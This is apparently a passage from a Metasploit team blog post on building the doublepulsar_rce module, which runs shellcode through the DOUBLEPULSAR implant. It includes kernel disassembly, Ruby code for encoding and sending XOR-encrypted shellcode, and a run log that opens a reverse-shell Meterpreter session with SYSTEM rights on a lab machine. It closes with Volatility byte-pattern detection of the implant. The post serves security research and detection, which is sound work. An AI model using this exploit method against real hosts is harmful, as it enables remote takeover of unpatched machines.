The destination for the copied data is an offset into the shellcode buffer, which is specified by the SESSION_SETUP parameters. Then the copied data is decoded using the XOR key, which means the shellcode data in the Trans2 request must be encoded before it is sent to the target. After the loop is finished, the last decoded address is compared with the expected ending address of the shellcode buffer (start of shellcode buffer + total size of shellcode). If the addresses do not match, then a "success" status is returned, but more data is expected in future requests before the shellcode in memory will be executed. If the addresses match, then the shellcode is executed, and the buffer is deallocated.
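The multi-request behavior suggests what a chunked sender might look like, even though the module itself only ever sends a single chunk. The sketch below is hypothetical throughout: `build_exec_requests` is not part of the module, the 4096-byte chunk size is assumed from the block size mentioned earlier, and the multiple-of-4 restriction is my inference from the decode loop working on 4-byte blocks.

```ruby
CHUNK_SIZE = 4096 # assumed chunk size

# Hypothetical helper: split shellcode into [params, data] pairs, one per request
def build_exec_requests(shellcode, xor_key, chunk_size = CHUNK_SIZE)
  # Inferred from the 4-byte decode loop: keep everything dword-aligned
  raise ArgumentError, 'length must be a multiple of 4' unless (shellcode.bytesize % 4).zero?

  key_bytes = [xor_key].pack('V').bytes
  total     = shellcode.bytesize

  (0...total).step(chunk_size).map do |offset|
    chunk  = shellcode.byteslice(offset, chunk_size)
    # Total size, size of this chunk, offset into the buffer, all XORed with the key
    params = [total, chunk.bytesize, offset].map { |v| v ^ xor_key }.pack('V3')
    data   = chunk.bytes.each_with_index.map { |b, i| b ^ key_bytes[i % 4] }.pack('C*')
    [params, data]
  end
end

xor_key  = 0x33C6DC64
requests = build_exec_requests("\xcc".b * 8192, xor_key) # placeholder bytes

requests.each_with_index do |(params, data), i|
  total, size, offset = params.unpack('V3').map { |v| v ^ xor_key }
  puts "request #{i}: total=#{total} size=#{size} offset=#{offset} data=#{data.bytesize} bytes"
end
```

Under this reading, only the request whose data reaches the end of the buffer would trigger execution, and the earlier ones would simply return a success status.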

The XOR key is updated after the shellcode executes, and a success code is returned to the client:

fffffa80`0226e17f 8b4544          mov     eax,dword ptr [rbp+44h]
fffffa80`0226e182 d1e8            shr     eax,1
fffffa80`0226e184 4831c9          xor     rcx,rcx
fffffa80`0226e187 88c1            mov     cl,al
fffffa80`0226e189 4801e9          add     rcx,rbp
fffffa80`0226e18c 8b09            mov     ecx,dword ptr [rcx]
fffffa80`0226e18e 31c8            xor     eax,ecx
fffffa80`0226e190 894544          mov     dword ptr [rbp+44h],eax    ; Update XOR key
fffffa80`0226e193 e843000000      call    fffffa80`0226e1db
fffffa80`0226e198 b010            mov     al,10h                     ; SUCCESS code
fffffa80`0226e19a eb08            jmp     fffffa80`0226e1a4

Shellcode execution is now complete.

Finishing the module

With Jacob's analysis of the implant's checks and our tag-teamed kernel debugging, we could complete the module:

def generate_doublepulsar_param(op, body)
  case OPCODES.key(op)
  when :ping, :kill
    "\x00" * 12
  when :exec
    Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))
  end
end

Crossing our fingers, we tested code execution with a Meterpreter payload:

msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:445 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64
[*] 192.168.56.115:445 - Sending shellcode to DOUBLEPULSAR
[+] 192.168.56.115:445 - Payload execution successful
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-09-25 18:26:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S7TDBIENPVM
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

"I'm in."

Caveats

While DOUBLEPULSAR is a sophisticated kernel-mode implant, its network signature is well-researched, and detection of the implant is highly accurate. On the system front, you cannot escape from memory forensics if kernel memory can be analyzed. Furthermore, any code or commands you execute through the implant are fair game for detection in userspace.

As a naive example, using Volatility's yarascan plugin with the byte string from Jacob's first disassembled implant check, we can see the DOUBLEPULSAR code in kernel memory:

wvu@kharak:~/Downloads$ VBoxManage debugvm "Windows Server 2008 R2" dumpvmcore --filename doublepulsar.core
wvu@kharak:~/Downloads$ vol.py -f doublepulsar.core --profile Win2008R2SP1x64 yarascan -KY "{ 48 31 db 48 31 f6 48 31 ff 49 8b 45 d8 8b 18 8b 70 04 8b 78 08 8b 4d 48 31 cb 31 ce 31 cf 41 3b 75 10 75 7b }"
Volatility Foundation Volatility Framework 2.6.1
[snip]
Rule: r1
Owner: (Unknown Kernel Memory)
0xffffffd00e5a  48 31 db 48 31 f6 48 31 ff 49 8b 45 d8 8b 18 8b   H1.H1.H1.I.E....
0xffffffd00e6a  70 04 8b 78 08 8b 4d 48 31 cb 31 ce 31 cf 41 3b   p..x..MH1.1.1.A;
0xffffffd00e7a  75 10 75 7b 3b 5d 54 48 8b 45 4c 74 16 e8 d1 00   u.u{;]TH.ELt....
0xffffffd00e8a  00 00 48 8d 53 04 48 31 c9 ff 55 10 48 89 45 4c   ..H.S.H1..U.H.EL
0xffffffd00e9a  89 5d 54 48 85 c0 74 5b 48 01 f7 48 39 df 77 4f   .]TH..t[H..H9.wO
0xffffffd00eaa  48 29 f7 48 01 c7 57 48 89 f1 51 49 8b 75 e8 f3   H).H..WH..QI.u..
0xffffffd00eba  a4 59 48 c1 e9 02 5e 8b 55 48 31 16 48 83 c6 04   .YH...^.UH1.H...
0xffffffd00eca  e2 f8 48 01 d8 48 39 c6 7c 21 ff 55 4c e8 81 00   ..H..H9.|!.UL...
0xffffffd00eda  00 00 8b 45 44 d1 e8 48 31 c9 88 c1 48 01 e9 8b   ...ED..H1...H...
0xffffffd00eea  09 31 c8 89 45 44 e8 43 00 00 00 b0 10 eb 08 b0   .1..ED.C........
0xffffffd00efa  20 eb 04 b0 30 eb 00 48 8b 4d 28 b4 00 66 01 41   ....0..H.M(..f.A
0xffffffd00f0a  1e 48 8b 45 20 4c 89 f9 4c 89 e4 41 5f 41 5e 41   .H.E.L..L..A_A^A
0xffffffd00f1a  5d 41 5c 5d 5b 5e 5f ff 60 78 31 c0 88 c8 c1 e9   ]A\][^_.`x1.....
0xffffffd00f2a  08 00 c8 c1 e9 08 00 c8 c1 e9 08 00 c8 c3 51 8b   ..............Q.
0xffffffd00f3a  45 44 89 c1 0f c9 d1 e0 31 c8 89 45 48 59 c3 51   ED......1..EHY.Q
0xffffffd00f4a  e8 0e 00 00 00 48 8b 45 20 48 8b 48 78 48 89 48   .....H.E.H.HxH.H
wvu@kharak:~/Downloads$

The specific sequence of bytes from the implant is not present in a clean system's kernel memory:

wvu@kharak:~/Downloads$ vol.py -f clean.core --profile Win2008R2SP1x64 yarascan -KY "{ 48 31 db 48 31 f6 48 31 ff 49 8b 45 d8 8b 18 8b 70 04 8b 78 08 8b 4d 48 31 cb 31 ce 31 cf 41 3b 75 10 75 7b }"
Volatility Foundation Volatility Framework 2.6.1
wvu@kharak:~/Downloads$

Conclusion

We would like to thank zerosum0x0 for his research into MS17-010, ETERNALBLUE, and, of course, DOUBLEPULSAR. We would also like to thank Countercept (now F-Secure) for providing the public with scripts to detect the implant in both SMB and RDP forms.

The DOUBLEPULSAR module is now available in the Metasploit Framework master branch as exploit/windows/smb/doublepulsar_rce. Please hack responsibly. :-)